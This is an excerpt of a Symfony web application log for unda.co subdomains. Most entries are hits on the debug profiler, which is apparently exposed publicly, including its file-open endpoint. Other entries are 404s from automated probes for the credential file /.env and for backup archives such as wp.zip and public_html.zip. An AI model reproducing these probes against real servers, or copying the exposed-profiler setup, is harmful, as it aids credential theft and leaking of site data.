  7482. [2025-12-20 17:22:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=time","method":"GET"} []
  7483. [2025-12-20 17:22:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7484. [2025-12-20 17:26:45] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"a9a058","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/a9a058/search/results?ip=141.95.74.78&limit=10&method=POST","method":"GET"} []
  7485. [2025-12-20 17:26:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10&method=POST","method":"GET"} []
  7486. [2025-12-20 17:31:18] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://www.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FRouting%2FMatcher%2FUrlMatcher.php&line=93","method":"GET"} []
  7487. [2025-12-20 17:33:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cb60d4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/cb60d4?panel=logger","method":"GET"} []
  7488. [2025-12-20 17:33:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  7489. [2025-12-20 17:34:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d30e86","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d30e86?panel=router","method":"GET"} []
  7490. [2025-12-20 17:34:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  7491. [2025-12-20 17:34:01] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"d30e86","_route":"_profiler_router"},"request_uri":"https://www.unda.co/_profiler/d30e86/router","method":"GET"} []
  7492. [2025-12-20 17:34:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=time","method":"GET"} []
  7493. [2025-12-20 17:34:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7494. [2025-12-20 17:34:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9ce7d","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/b9ce7d","method":"GET"} []
  7495. [2025-12-20 17:34:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  7496. [2025-12-20 17:34:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=security","method":"GET"} []
  7497. [2025-12-20 17:34:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7498. [2025-12-20 17:39:08] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7499. [2025-12-20 17:39:09] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"95e6d7","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/95e6d7","method":"GET"} []
  7500. [2025-12-20 17:39:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32afde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32afde?panel=router","method":"GET"} []
  7501. [2025-12-20 17:39:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  7502. [2025-12-20 17:39:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f7acf9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f7acf9?panel=security","method":"GET"} []
  7503. [2025-12-20 17:39:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7504. [2025-12-20 17:46:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"75151e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/75151e","method":"GET"} []
  7505. [2025-12-20 17:46:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  7506. [2025-12-20 17:48:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21?panel=request","method":"GET"} []
  7507. [2025-12-20 17:48:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7508. [2025-12-20 17:53:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=request","method":"GET"} []
  7509. [2025-12-20 17:53:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7510. [2025-12-20 17:53:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee0387","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee0387?panel=request","method":"GET"} []
  7511. [2025-12-20 17:53:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7512. [2025-12-20 17:59:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7513. [2025-12-20 17:59:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  7514. [2025-12-20 18:05:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //auth.unda.co/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //auth.unda.co/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7515. [2025-12-20 18:11:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc","method":"GET"} []
  7516. [2025-12-20 18:11:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  7517. [2025-12-20 18:12:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42","method":"GET"} []
  7518. [2025-12-20 18:12:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  7519. [2025-12-20 18:12:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7520. [2025-12-20 18:14:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=form","method":"GET"} []
  7521. [2025-12-20 18:14:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  7522. [2025-12-20 18:19:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7523. [2025-12-20 18:19:25] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7524. [2025-12-20 18:19:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7525. [2025-12-20 18:19:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7526. [2025-12-20 18:19:25] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7527. [2025-12-20 18:19:25] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7528. [2025-12-20 18:19:25] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7529. [2025-12-20 18:19:25] security.DEBUG: Calling Authentication entry point. [] []
  7530. [2025-12-20 18:19:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7531. [2025-12-20 18:20:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"acf638","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/acf638?panel=form","method":"GET"} []
  7532. [2025-12-20 18:20:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  7533. [2025-12-20 18:20:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7534. [2025-12-20 18:25:10] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  7535. [2025-12-20 18:27:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=cache","method":"GET"} []
  7536. [2025-12-20 18:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7537. [2025-12-20 18:28:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"51ec68","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/51ec68?panel=exception","method":"GET"} []
  7538. [2025-12-20 18:28:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  7539. [2025-12-20 18:30:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7540. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7541. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webapps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webapps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7542. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7543. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7544. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /subdomain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /subdomain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7545. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domains.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domains.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7546. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /websites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /websites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7547. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /www.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /www.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7548. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7549. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7550. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7551. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7552. [2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7553. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7554. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7555. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7556. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7557. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
